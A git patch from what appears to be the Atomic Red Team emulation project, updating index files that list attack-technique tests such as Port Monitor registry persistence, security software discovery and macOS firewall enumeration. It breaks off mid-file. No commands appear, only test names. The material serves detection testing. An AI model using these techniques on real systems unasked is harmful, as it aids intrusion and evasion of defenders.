From c14c0357dc858ac0884c297f366fa7eeaf9f7b24 Mon Sep 17 00:00:00 2001 From: Anton Kutepov <61383585+aw350m33d@users.noreply.github.com> Date: Mon, 19 Apr 2021 20:49:59 +0300 Subject: [PATCH] [OSCD Sprint #2] Final Pull Request / Summary (#1431) * Updating T1016 to include macos firewall enumeration * Tests added * standardize display name * Add tests for T1134.001 Access Token Impersonation/Theft (#1236) * Generate docs from job=validate_atomics_generate_docs branch=oscd * adding socketfilterfw and cleaning up description formatting, adding description details * Changing to device manufacturer based test * Generate docs from job=validate_atomics_generate_docs branch=oscd * Add test for T1006 Direct Volume Access (#1254) * Generate docs from job=validate_atomics_generate_docs branch=oscd * [OSCD] T1036.004: Masquerade Task or Service - 2 tests (#1253) * T1036.004 - 2 tests added * Update T1036.004.yaml Co-authored-by: Carrie Roberts * Generate docs from job=validate_atomics_generate_docs branch=oscd * T1136.002 - 2 tests added (#1252) * Generate docs from job=validate_atomics_generate_docs branch=oscd * [OSCD] Create atomic test for T1113 for Windows (#1251) * Generate docs from job=validate_atomics_generate_docs branch=oscd * update T1564.002 * update T1564.002 * add Gatekeeper disable; add cleanup for security tools disable; add another launchagent for carbon black defense; remove Gatekeeper disable command from Gatekeeper bypass technique * Added T1562.006 tests to emulate indicator blocking by modifying configuration files * split linux and macos tests for TT1518.001; update processes list * Update T1518.001.yaml * Removed prereq and fixed command endings * Indirect command execution - conhost (#1265) * Generate docs from job=validate_atomics_generate_docs branch=oscd * [OSCD] Office persiststence : Office test (#1266) * Office persiststence : Office test * Added technique details * Generate docs from job=validate_atomics_generate_docs branch=oscd * Generate docs from job=validate_atomics_generate_docs branch=oscd * Generate docs from job=validate_atomics_generate_docs branch=oscd * Generate docs from job=validate_atomics_generate_docs branch=oscd * Remove index files to avoid CI complaints. * Grr * Generate docs from job=validate_atomics_generate_docs branch=oscd * Generate docs from job=validate_atomics_generate_docs branch=oscd * Update T1518.001.yaml * [OSCD] Adding T1547.010 (#1264) * Port monitor addition * Rename T1547.010.yml to T1547.010.yaml * Generate docs from job=validate_atomics_generate_docs branch=oscd * Generate docs from job=validate_atomics_generate_docs branch=oscd * Generate docs from job=validate_atomics_generate_docs branch=oscd * Fixed typos in test names Co-authored-by: remotephone@gmail.com Co-authored-by: haresudhan Co-authored-by: Carrie Roberts Co-authored-by: gregclermont <580609+gregclermont@users.noreply.github.com> Co-authored-by: CircleCI Atomic Red Team doc generator Co-authored-by: Carl <57147304+rc-grey@users.noreply.github.com> Co-authored-by: mrblacyk Co-authored-by: sn0w0tter <42819997+sn0w0tter@users.noreply.github.com> Co-authored-by: Yugoslavskiy Daniil Co-authored-by: yugoslavskiy Co-authored-by: omkargudhate22 <36105402+omkar72@users.noreply.github.com> Co-authored-by: Keith McCammon Co-authored-by: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> --- atomics/Indexes/Indexes-CSV/index.csv | 14 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 4 +- atomics/Indexes/Indexes-CSV/macos-index.csv | 3 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 8 +- atomics/Indexes/Indexes-Markdown/index.md | 18 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 12 +- atomics/Indexes/Matrices/matrix.md | 4 +- atomics/Indexes/Matrices/windows-matrix.md | 4 +- atomics/Indexes/index.yaml | 3000 +++++++++-------- atomics/T1016/T1016.md | 31 + atomics/T1016/T1016.yaml | 17 + atomics/T1137.002/T1137.002.md | 4 +- atomics/T1137.002/T1137.002.yaml | 2 +- atomics/T1518.001/T1518.001.md | 47 +- atomics/T1518.001/T1518.001.yaml | 20 +- atomics/T1547.010/T1547.010.md | 51 + atomics/T1547.010/T1547.010.yaml | 20 + atomics/T1562.006/T1562.006.md | 4 +- atomics/T1562.006/T1562.006.yaml | 2 +- atomics/used_guids.txt | 5 +- 22 files changed, 1762 insertions(+), 1515 deletions(-) create mode 100644 atomics/T1547.010/T1547.010.md create mode 100644 atomics/T1547.010/T1547.010.yaml diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c357580aec..e8a1fb2e1c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -49,6 +49,7 @@ privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell @@ -148,10 +149,11 @@ persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406 persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt -persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt +persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual @@ -397,7 +399,7 @@ defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash -defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash +defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt @@ -661,9 +663,10 @@ discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory C discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell -discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh -discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt -discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt +discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh +discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh +discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt +discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt @@ -687,6 +690,7 @@ discovery,T1016,System Network Configuration Discovery,4,System Network Configur discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt +discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 8fa1cc0947..e5a5c20c55 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -78,7 +78,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash -defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash +defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash @@ -137,7 +137,7 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh -discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh +discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 3f14798bff..56fc758375 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -132,13 +132,14 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh -discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps,ba62ce11-e820-485f-9c17-6f3c857cd840,sh +discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh +discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index a2fb911fd8..ae0abe172e 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -103,6 +103,7 @@ privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt +privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell @@ -366,9 +367,10 @@ persistence,T1078.003,Local Accounts,1,Create local account with admin privilige persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt -persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt +persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt +persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt @@ -472,8 +474,8 @@ discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory C discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell -discovery,T1518.001,Security Software Discovery,4,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt -discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt +discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt +discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f34e1e66a0..1fd6bd0eaf 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -105,7 +105,8 @@ - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] - [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - Atomic Test #1: Plist Modification [macos] -- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] @@ -299,7 +300,7 @@ - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows] - T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1137.002 Office Test](../../T1137.002/T1137.002.md) - - Atomic Test #1: Office Apllication Startup Test Persistence [windows] + - Atomic Test #1: Office Application Startup Test Persistence [windows] - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] @@ -312,7 +313,8 @@ - [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - Atomic Test #1: Plist Modification [macos] - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -738,7 +740,7 @@ - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] - - Atomic Test #2: Lgging Configuration Changes on Linux Host [linux] + - Atomic Test #2: Logging Configuration Changes on Linux Host [linux] - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](../../T1070/T1070.md) - Atomic Test #1: Indicator Removal using FSUtil [windows] @@ -1151,9 +1153,10 @@ - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #1: Security Software Discovery [windows] - Atomic Test #2: Security Software Discovery - powershell [windows] - - Atomic Test #3: Security Software Discovery - ps [linux, macos] - - Atomic Test #4: Security Software Discovery - Sysmon Service [windows] - - Atomic Test #5: Security Software Discovery - AV Discovery via WMI [windows] + - Atomic Test #3: Security Software Discovery - ps (macOS) [macos] + - Atomic Test #4: Security Software Discovery - ps (Linux) [linux] + - Atomic Test #5: Security Software Discovery - Sysmon Service [windows] + - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows] - [T1518 Software Discovery](../../T1518/T1518.md) - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows] - Atomic Test #2: Applications Installed [windows] @@ -1181,6 +1184,7 @@ - Atomic Test #5: List Open Egress Ports [windows] - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows] - Atomic Test #7: Qakbot Recon [windows] + - Atomic Test #8: List macOS Firewall Rules [macos] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 2cade40ea2..92873a68f3 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -254,7 +254,7 @@ - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] - - Atomic Test #2: Lgging Configuration Changes on Linux Host [linux] + - Atomic Test #2: Logging Configuration Changes on Linux Host [linux] - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md) @@ -415,7 +415,7 @@ - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - - Atomic Test #3: Security Software Discovery - ps [linux, macos] + - Atomic Test #4: Security Software Discovery - ps (Linux) [linux] - T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1497.001 System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 76f4553c2a..7c66290d3e 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -366,7 +366,7 @@ - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - - Atomic Test #3: Security Software Discovery - ps [linux, macos] + - Atomic Test #3: Security Software Discovery - ps (macOS) [macos] - [T1518 Software Discovery](../../T1518/T1518.md) - Atomic Test #3: Find and Display Safari Browser Version [macos] - [T1497.001 System Checks](../../T1497.001/T1497.001.md) @@ -377,6 +377,7 @@ - Atomic Test #7: Hostname Discovery [linux, macos] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] + - Atomic Test #8: List macOS Firewall Rules [macos] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos] - [T1033 System Owner/User Discovery](../../T1033/T1033.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e882a82fef..4aa16c0132 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -218,7 +218,8 @@ - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] -- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] @@ -665,7 +666,7 @@ - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows] - T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1137.002 Office Test](../../T1137.002/T1137.002.md) - - Atomic Test #1: Office Apllication Startup Test Persistence [windows] + - Atomic Test #1: Office Application Startup Test Persistence [windows] - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] @@ -676,7 +677,8 @@ - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -853,8 +855,8 @@ - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #1: Security Software Discovery [windows] - Atomic Test #2: Security Software Discovery - powershell [windows] - - Atomic Test #4: Security Software Discovery - Sysmon Service [windows] - - Atomic Test #5: Security Software Discovery - AV Discovery via WMI [windows] + - Atomic Test #5: Security Software Discovery - Sysmon Service [windows] + - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows] - [T1518 Software Discovery](../../T1518/T1518.md) - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows] - Atomic Test #2: Applications Installed [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 0af96b9231..4a64701bf2 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -56,7 +56,7 @@ | | | [Logon Script 